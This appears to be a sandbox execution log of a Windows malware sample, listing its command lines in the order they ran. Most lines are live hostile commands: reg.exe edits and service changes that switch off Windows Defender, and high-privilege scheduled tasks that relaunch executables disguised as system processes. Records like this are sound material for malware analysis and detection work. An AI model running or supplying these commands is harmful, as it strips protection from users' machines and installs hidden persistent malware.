schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 5 /tr "'C:\Windows\ja-JP\msedge.exe'" /rl HIGHEST /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "servicess" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\services.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\services.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "servicess" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\services.exe'" /rl HIGHEST /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 11 /tr "'C:\Program Files\Java\jre-1.8\winlogon.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files\Java\jre-1.8\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\Program Files\Java\jre-1.8\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\Idle.exe'" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\Idle.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\Idle.exe'" /rl HIGHEST /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 10 /tr "'C:\Windows\it-IT\msedge.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Windows\it-IT\msedge.exe'" /rl HIGHEST /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 11 /tr "'C:\Windows\it-IT\msedge.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\Documents\sihost.exe'" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Users\All Users\Documents\sihost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\Documents\sihost.exe'" /rl HIGHEST /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\6GXVlfePFq.bat"

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\ja-JP\msedge.exe

"C:\Windows\ja-JP\msedge.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\ZqKnM.bat" "

C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe

"C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4148 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\FunCheker.exe

"C:\Users\Admin\AppData\Local\Temp\FunCheker.exe"

C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe

"C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\clear_av.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FunChecker .bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\avdisable.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\kXeJA.vbe"

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\ZqKnM.bat" "

C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe

"C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\MSBuild\winlogon.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files (x86)\MSBuild\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\MSBuild\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 13 /tr "'C:\Windows\Performance\WinSAT\DataStore\SearchApp.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Windows\Performance\WinSAT\DataStore\SearchApp.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 14 /tr "'C:\Windows\Performance\WinSAT\DataStore\SearchApp.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\dllhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Users\Default User\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\Idle.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\Idle.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\Idle.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\Templates\System.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Users\All Users\Templates\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\Templates\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\WindowsHolographicDevices\cmd.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Users\All Users\WindowsHolographicDevices\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\WindowsHolographicDevices\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\taskhostw.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\taskhostw.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\taskhostw.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Windows\InputMethod\SHARED\conhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\InputMethod\SHARED\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Windows\InputMethod\SHARED\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\conhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\msedge.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\msedge.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\msedge.exe'" /rl HIGHEST /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\wzSW7E5aas.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe

"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\pakqiPPahT.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe

"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\oqEnL4f5pl.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\avdisable.bat" "

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe

"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\kbrh69MYEy.bat"

C:\Windows\system32\reg.exe

reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\system32\reg.exe

reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\clear_av.bat" "

C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe

"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\gyyX5OxKdc.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe

"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\IxigaWiN4Z.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe

"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ATZuYpZxcK.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe

"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\3B2OAH3dio.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe

"C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\kXeJA.vbe"

C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe

"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\TK13bru719.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe

"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\ZqKnM.bat" "

C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe

"C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\n9GQh003RW.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Portable Devices\RuntimeBroker.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Portable Devices\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\cmd.exe'" /f

C:\Windows\system32\schtasks.exe

